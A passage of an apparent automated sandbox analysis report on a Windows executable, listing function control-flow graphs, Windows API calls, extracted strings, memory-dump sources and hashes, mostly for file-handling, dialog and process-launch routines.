471 16adf6-16adfe 466->471 472 16ae25-16ae2a 467->472 473 16ae30-16ae4b 467->473 484 16af0f-16af23 call 17031b 468->484 471->426 477 16ae04-16ae12 call 15f10e 471->477 472->468 472->473 493 16ae95-16ae9c 473->493 494 16ae4d-16ae87 473->494 477->484 487 16ad61-16ad69 call 174654 479->487 488 16ad5c-16ad5e 479->488 480->426 483 16ad72-16ad79 call 1720ce 480->483 483->426 505 16af25-16af29 484->505 506 16af30-16af83 call 15f10e call 169592 GetDlgItem SetWindowTextW SendMessageW call 1720e9 484->506 487->480 488->487 496 16ae9e-16aeb6 call 1720b3 493->496 497 16aeca-16aeed call 1720b3 * 2 493->497 528 16ae8b-16ae8d 494->528 529 16ae89 494->529 496->497 515 16aeb8-16aec5 call 15f0e6 496->515 497->484 534 16aeef-16aefd call 15f0e6 497->534 510 16ab77-16ab8c SetFileAttributesW 503->510 504->426 505->506 511 16af2b-16af2d 505->511 542 16af88-16af8c 506->542 516 16ac32-16ac3e GetFileAttributesW 510->516 517 16ab92-16abc5 call 15b100 call 15adf5 call 1720b3 510->517 511->506 515->497 525 16ac40-16ac4f DeleteFileW 516->525 526 16acae-16acc3 call 15a1a9 516->526 552 16abc7-16abd6 call 1720b3 517->552 553 16abd8-16abe6 call 15b52e 517->553 525->526 533 16ac51-16ac54 525->533 526->504 540 16ab72 526->540 528->493 529->528 538 16ac58-16ac84 call 153f5b GetFileAttributesW 533->538 534->484 549 16ac56-16ac57 538->549 550 16ac86-16ac9c MoveFileW 538->550 540->510 542->426 546 16af92-16afa4 SendMessageW 542->546 546->426 549->538 550->526 551 16ac9e-16aca8 MoveFileExW 550->551 551->526 552->553 558 16abec-16ac2b call 1720b3 call 16dea0 552->558 553->504 553->558 558->516
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0016AA4A
                                                                                      • Part of subcall function 001696EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 001697B4
                                                                                    • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,0016A35D,?,00000000), ref: 0016AB7F
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0016AC39
                                                                                    • DeleteFileW.KERNEL32(?), ref: 0016AC47
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0016AD90
                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0016AF1A
                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0016AF55
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0016AF65
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,0019412A), ref: 0016AF79
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0016AFA2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                    • API String ID: 3676479488-312220925
                                                                                    • Opcode ID: 29213f42ff8cae7fda19cb4d18ce1995913640125cd8ca5829160aa6907231f4
                                                                                    • Instruction ID: ab385f966ec49c62b3ae7a0b5135f90f7df144b6c205793638a38269cf1c69fd
                                                                                    • Opcode Fuzzy Hash: 29213f42ff8cae7fda19cb4d18ce1995913640125cd8ca5829160aa6907231f4
                                                                                    • Instruction Fuzzy Hash: EFE17E72900229AAEF24EBA4DD85DEE73BCAF15350F5040A6F919F7041EB709B94CF61
                                                                                    Function 0015CED7 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 563 15ced7-15cf51 call 15c88e GetWindowRect GetClientRect 566 15cf57-15cf5f 563->566 567 15cff2-15cffa 563->567 568 15cf65-15cfae 566->568 569 15d034-15d04f GetSystemMetrics GetWindow 566->569 567->569 570 15cffc-15d02e GetWindowTextW call 15c91f SetWindowTextW 567->570 572 15cfb0 568->572 573 15cfb2-15cfb4 568->573 571 15d12d-15d12f 569->571 570->569 578 15d135-15d13f 571->578 579 15d054-15d05a 571->579 572->573 576 15cfb6 573->576 577 15cfb8-15cfee GetWindowLongW GetWindowRect 573->577 576->577 577->567 579->578 580 15d060-15d078 GetWindowTextW 579->580 581 15d09f-15d0a4 580->581 582 15d07a-15d099 call 15c91f SetWindowTextW 580->582 585 15d0a6-15d114 GetWindowRect 581->585 586 15d11b-15d12a GetWindow 581->586 582->581 585->586 586->578 588 15d12c 586->588 588->571
                                                                                    APIs
                                                                                      • Part of subcall function 0015C88E: _wcschr.LIBVCRUNTIME ref: 0015C8BD
                                                                                    • GetWindowRect.USER32(?,?), ref: 0015CF0E
                                                                                    • GetClientRect.USER32(?,?), ref: 0015CF1A
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0015CFBB
                                                                                    • GetWindowRect.USER32(?,?), ref: 0015CFE8
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0015D007
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0015D02E
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0015D036
                                                                                    • GetWindow.USER32(?,00000005), ref: 0015D041
                                                                                    • GetWindowTextW.USER32(00000000,?,00000400), ref: 0015D06C
                                                                                    • SetWindowTextW.USER32(00000000,00000000), ref: 0015D099
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0015D0AC
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0015D11E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                    • String ID: d
                                                                                    • API String ID: 4134264131-2564639436
                                                                                    • Opcode ID: 850a4796fdee60918246fd9ff7fe5f2bc0d4305cffea3ded1b4d106b085acc6d
                                                                                    • Instruction ID: 6dad087e630a3fc557c5e716ac5be7eba53423262143385519112acbd8e1a6d4
                                                                                    • Opcode Fuzzy Hash: 850a4796fdee60918246fd9ff7fe5f2bc0d4305cffea3ded1b4d106b085acc6d
                                                                                    • Instruction Fuzzy Hash: 35617E71108300AFD310DF68CD88E6BBBEAEFC9715F44451EFA9496290C774E9498B52
                                                                                    Function 0016B70E Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 96windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetDlgItem.USER32(00000068,001A8958), ref: 0016B71D
                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00169325), ref: 0016B748
                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0016B757
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,001802E4), ref: 0016B761
                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0016B777
                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0016B78D
                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0016B7CD
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0016B7D7
                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0016B7E6
                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0016B809
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00181368), ref: 0016B814
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$ItemShowWindow
                                                                                    • String ID: \
                                                                                    • API String ID: 1207805008-2967466578
                                                                                    • Opcode ID: 51cc3e2ed84eb38fd51c2e4076d503d8eb7b16333639ba898f225ec280b8ddf1
                                                                                    • Instruction ID: a4c100dd3bc4221f2ead2789f2d90ed4413f359f087cc5989b25f990adbf5e4c
                                                                                    • Opcode Fuzzy Hash: 51cc3e2ed84eb38fd51c2e4076d503d8eb7b16333639ba898f225ec280b8ddf1
                                                                                    • Instruction Fuzzy Hash: 232135712897447BE311EB249C81FAF7EDCEF82714F000A19FA90E61D1D7A54A488BA7
                                                                                    Function 0016B9AA Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 621 16b9aa-16b9c2 call 16cec0 624 16bc0e-16bc16 621->624 625 16b9c8-16b9d4 call 1720b3 621->625 625->624 628 16b9da-16ba02 call 16dea0 625->628 631 16ba04 628->631 632 16ba0c-16ba19 628->632 631->632 633 16ba1d-16ba26 632->633 634 16ba1b 632->634 635 16ba5e 633->635 636 16ba28-16ba2a 633->636 634->633 638 16ba62-16ba64 635->638 637 16ba32-16ba35 636->637 639 16bbc2-16bbc7 637->639 640 16ba3b-16ba43 637->640 641 16ba66-16ba69 638->641 642 16ba6b-16ba6d 638->642 647 16bbbc-16bbc0 639->647 648 16bbc9 639->648 645 16bbdb-16bbe3 640->645 646 16ba49-16ba4f 640->646 641->642 643 16ba80-16ba92 call 15b09c 641->643 642->643 644 16ba6f-16ba76 642->644 656 16ba94-16baa1 call 160b12 643->656 657 16baab-16bab6 call 159dff 643->657 644->643 649 16ba78 644->649 650 16bbe5-16bbe7 645->650 651 16bbeb-16bbf3 645->651 646->645 653 16ba55-16ba5c 646->653 647->639 654 16bbce-16bbd2 647->654 648->654 649->643 650->651 651->638 653->635 653->637 654->645 656->657 662 16baa3 656->662 663 16bad3-16bae0 ShellExecuteExW 657->663 664 16bab8-16bacf call 15ae20 657->664 662->657 665 16bae6-16baf9 663->665 666 16bc0c-16bc0d 663->666 664->663 668 16bb0c-16bb0e 665->668 669 16bafb-16bb02 665->669 666->624 672 16bb10-16bb19 668->672 673 16bb21-16bb40 call 16be69 668->673 669->668 671 16bb04-16bb0a 669->671 671->668 674 16bb77-16bb83 CloseHandle 671->674 672->673 682 16bb1b-16bb1f ShowWindow 672->682 673->674 691 16bb42-16bb4a 673->691 675 16bb94-16bba2 674->675 676 16bb85-16bb92 call 160b12 674->676 680 16bba4-16bba6 675->680 681 16bbff-16bc01 675->681 676->675 688 16bbf8 676->688 680->681 686 16bba8-16bbae 680->686 681->666 685 16bc03-16bc05 681->685 682->673 685->666 689 16bc07-16bc0a ShowWindow 685->689 686->681 690 16bbb0-16bbba 686->690 688->681 689->666 690->681 691->674 692 16bb4c-16bb5d GetExitCodeProcess 691->692 692->674 693 16bb5f-16bb69 692->693 694 16bb70 693->694 695 16bb6b 693->695 694->674 695->694
                                                                                    APIs
                                                                                    • ShellExecuteExW.SHELL32(000001C0), ref: 0016BAD8
                                                                                    • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 0016BB1D
                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0016BB55
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0016BB7B
                                                                                    • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 0016BC0A
                                                                                      • Part of subcall function 00160B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0015AC49,?,?,?,0015ABF8,?,-00000002,?,00000000,?), ref: 00160B28
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                    • String ID: $.exe$.inf
                                                                                    • API String ID: 3686203788-2452507128
                                                                                    • Opcode ID: 35d97a96c80edbd3f1331377b7307a13cd6f57aaae27fc9dd41c3ba54d3c935a
                                                                                    • Instruction ID: 0d1d4fefc3807e43baa347c5484b9628c216c6e5db201af8e34df86913521d1e
                                                                                    • Opcode Fuzzy Hash: 35d97a96c80edbd3f1331377b7307a13cd6f57aaae27fc9dd41c3ba54d3c935a
                                                                                    • Instruction Fuzzy Hash: F051AF7150D3809AD731AF64DD806BBB7E9AF85704F04081DE8C1D7165EBB29AE8CB62
                                                                                    Function 0015CACC Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 258COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 696 15cacc-15cb00 call 16cdf0 call 16cec0 call 170138 703 15cb33-15cb3c call 15f10e 696->703 704 15cb02-15cb31 GetModuleFileNameW call 15b88c call 15f0e6 696->704 708 15cb41-15cb65 call 159401 call 15973d 703->708 704->708 715 15cdb8-15cdd3 call 159437 708->715 716 15cb6b-15cb74 708->716 718 15cb77-15cb7a 716->718 719 15cb80-15cb86 call 159aeb 718->719 720 15cca8-15ccc8 call 1599e0 call 1720d3 718->720 725 15cb8b-15cbb2 call 15990d 719->725 720->715 730 15ccce-15cce7 call 15990d 720->730 731 15cc71-15cc74 725->731 732 15cbb8-15cbc0 725->732 744 15ccf0-15cd02 call 1720d3 730->744 745 15cce9-15ccee 730->745 736 15cc77-15cc99 call 1599e0 731->736 734 15cbc2-15cbca 732->734 735 15cbeb-15cbf6 732->735 734->735 738 15cbcc-15cbe6 call 173660 734->738 739 15cc21-15cc29 735->739 740 15cbf8-15cc04 735->740 736->718 755 15cc9f-15cca2 736->755 760 15cc67-15cc6f 738->760 761 15cbe8 738->761 742 15cc55-15cc59 739->742 743 15cc2b-15cc33 739->743 740->739 747 15cc06-15cc0b 740->747 742->731 750 15cc5b-15cc5e 742->750 743->742 749 15cc35-15cc4f call 173660 743->749 744->715 767 15cd08-15cd25 call 1606e9 call 1720ce 744->767 751 15cd27-15cd2f 745->751 747->739 754 15cc0d-15cc1f call 173589 747->754 749->715 749->742 750->732 756 15cd34-15cd41 751->756 757 15cd31 751->757 754->739 768 15cc63 754->768 755->715 755->720 764 15cd43-15cd45 756->764 765 15cdad-15cdb5 756->765 757->756 760->736 761->735 769 15cd46-15cd50 764->769 765->715 767->751 768->760 769->765 771 15cd52-15cd56 769->771 773 15cd90-15cd93 771->773 774 15cd58-15cd5f 771->774 776 15cd95-15cd9b 773->776 777 15cd9d-15cd9f 773->777 778 15cd86 774->778 779 15cd61-15cd64 774->779 776->777 782 15cda0 776->782 777->782 781 15cd88-15cd8e 778->781 783 15cd66-15cd69 779->783 784 15cd82-15cd84 779->784 785 15cda4-15cdab 781->785 782->785 786 15cd7e-15cd80 783->786 787 15cd6b-15cd6e 783->787 784->781 785->765 785->769 786->781 788 15cd70-15cd74 787->788 789 15cd7a-15cd7c 787->789 788->782 790 15cd76-15cd78 788->790 789->781 790->781
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0015CAD1
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0015CAEF
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0015CAB3,?), ref: 0015CB0A
                                                                                      • Part of subcall function 001606E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0015B25B,00000000,?,?,?,?), ref: 00160705
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
                                                                                    • String ID: *messages***$*messages***$R$a
                                                                                    • API String ID: 803915177-2900423073
                                                                                    • Opcode ID: f1e967f278d084617f141985775de125752341819f2b6d6fc51ffaa0c1257d5b
                                                                                    • Instruction ID: 2f1caa7313eb87cc0006574ba6637e5cea48c8da935aae6e8acc7a31613c8619
                                                                                    • Opcode Fuzzy Hash: f1e967f278d084617f141985775de125752341819f2b6d6fc51ffaa0c1257d5b
                                                                                    • Instruction Fuzzy Hash: 799105B1900304DEDB24DFA8CC45BEEBBB4EF54701F10456AEA69EB291D7709989CBD0
                                                                                    Function 001773AE Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 791 1773ae-1773c7 792 1773dd-1773e2 791->792 793 1773c9-1773d9 call 17b9bc 791->793 794 1773e4-1773ec 792->794 795 1773ef-177413 MultiByteToWideChar 792->795 793->792 800 1773db 793->800 794->795 797 1775a6-1775b9 call 16d783 795->797 798 177419-177425 795->798 801 177427-177438 798->801 802 177479 798->802 800->792 805 177457-177468 call 1759fc 801->805 806 17743a-177449 call 17f160 801->806 804 17747b-17747d 802->804 808 177483-177496 MultiByteToWideChar 804->808 809 17759b 804->809 805->809 819 17746e 805->819 806->809 818 17744f-177455 806->818 808->809 812 17749c-1774ae call 177a09 808->812 813 17759d-1775a4 call 177616 809->813 820 1774b3-1774b7 812->820 813->797 822 177474-177477 818->822 819->822 820->809 823 1774bd-1774c4 820->823 822->804 824 1774c6-1774cb 823->824 825 1774fe-17750a 823->825 824->813 826 1774d1-1774d3 824->826 827 177556 825->827 828 17750c-17751d 825->828 826->809 829 1774d9-1774f3 call 177a09 826->829 830 177558-17755a 827->830 831 17751f-17752e call 17f160 828->831 832 177538-177549 call 1759fc 828->832 829->813 846 1774f9 829->846 835 177594-17759a call 177616 830->835 836 17755c-177575 call 177a09 830->836 831->835 844 177530-177536 831->844 832->835 845 17754b 832->845 835->809 836->835 849 177577-17757e 836->849 848 177551-177554 844->848 845->848 846->809 848->830 850 177580-177581 849->850 851 1775ba-1775c0 849->851 852 177582-177592 WideCharToMultiByte 850->852 851->852 852->835 853 1775c2-1775c9 call 177616 852->853 853->813
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00172FC2,00172FC2,?,?,?,001775FF,00000001,00000001,F5E85006), ref: 00177408
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001775FF,00000001,00000001,F5E85006,?,?,?), ref: 0017748E
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00177588
                                                                                    • __freea.LIBCMT ref: 00177595
                                                                                      • Part of subcall function 001759FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,001723AA,?,0000015D,?,?,?,?,00172F29,000000FF,00000000,?,?), ref: 00175A2E
                                                                                    • __freea.LIBCMT ref: 0017759E
                                                                                    • __freea.LIBCMT ref: 001775C3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1414292761-0
                                                                                    • Opcode ID: 889cbd0d842565434816cb1a18d7f91747d39297a741d27dc373c3dc39a34942
                                                                                    • Instruction ID: cbb9d2c6ba802d3361a37bdb03ce7f48b8f61088eb5d89b21507023874a4cdc2
                                                                                    • Opcode Fuzzy Hash: 889cbd0d842565434816cb1a18d7f91747d39297a741d27dc373c3dc39a34942
                                                                                    • Instruction Fuzzy Hash: F451C172604216ABEB258F64CC85EBF77BAEB45750F158629FC09D6180EB34DD50CAA0
                                                                                    Function 00169036 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0015F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0015F324
                                                                                      • Part of subcall function 0015F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0015DEC8,Crypt32.dll,?,0015DF4A,?,0015DF2E,?,?,?,?), ref: 0015F346
                                                                                    • OleInitialize.OLE32(00000000), ref: 0016904F
                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00169086
                                                                                    • SHGetMalloc.SHELL32(001920E8), ref: 00169090
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                    • String ID: riched20.dll$3Ro
                                                                                    • API String ID: 3498096277-3613677438
                                                                                    • Opcode ID: 878540be8b262f981c2a0c498f01f6d136538a85c0adc0fc2173397fb3495990
                                                                                    • Instruction ID: 14f5ce7b3fab78944bd27d95ef998c34802ebdfb00972676ecff181d47bc271a
                                                                                    • Opcode Fuzzy Hash: 878540be8b262f981c2a0c498f01f6d136538a85c0adc0fc2173397fb3495990
                                                                                    • Instruction Fuzzy Hash: D5F03CB1800109ABDB10AF9AD8499EEFBBCEF94701F00405BE814A2600D7B45645CBA1
                                                                                    Function 0015F9D1 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0015FDC9: ResetEvent.KERNEL32(?,?,0015F9F3,00AB2CE0,?,00191E74,00000000,0017F79B,000000FF,000001B8,0015FC8F,?,?,?,?,0015A5A0), ref: 0015FDE9
                                                                                      • Part of subcall function 0015FDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,0015A5A0,?,?,?,?,0017F79B,000000FF), ref: 0015FDFD
                                                                                    • ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0015FA05
                                                                                    • CloseHandle.KERNEL32(?,?), ref: 0015FA1F
                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0015FA38
                                                                                    • CloseHandle.KERNELBASE(?), ref: 0015FA44
                                                                                    • CloseHandle.KERNEL32(?), ref: 0015FA50
                                                                                      • Part of subcall function 0015FAC7: WaitForSingleObject.KERNEL32(?,000000FF,0015FD0B,?,?,0015FD80,?,?,?,?,?,0015FD6A), ref: 0015FACD
                                                                                      • Part of subcall function 0015FAC7: GetLastError.KERNEL32(?,?,0015FD80,?,?,?,?,?,0015FD6A), ref: 0015FAD9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1868215902-0
                                                                                    • Opcode ID: b384db0d30943a1812e79cd92f7838e06defb2e5a39124316e4dd45bc85bac62
                                                                                    • Instruction ID: ab4186040e7e4942de9757ba936a02aaa075a4db3a0af3453de610cae3bae07a
                                                                                    • Opcode Fuzzy Hash: b384db0d30943a1812e79cd92f7838e06defb2e5a39124316e4dd45bc85bac62
                                                                                    • Instruction Fuzzy Hash: F201B532000B48EFC7329B68DD44F8ABBFAFB49751F00452DF66E96560CB712849CB21
                                                                                    Function 00168FC8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 896 168fc8-168fe7 GetClassNameW 897 16900f-169011 896->897 898 168fe9-168ffe call 160b12 896->898 900 169013-169016 SHAutoComplete 897->900 901 16901c-169020 897->901 903 169000-16900c FindWindowExW 898->903 904 16900e 898->904 900->901 903->904 904->897
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00168FDF
                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00169016
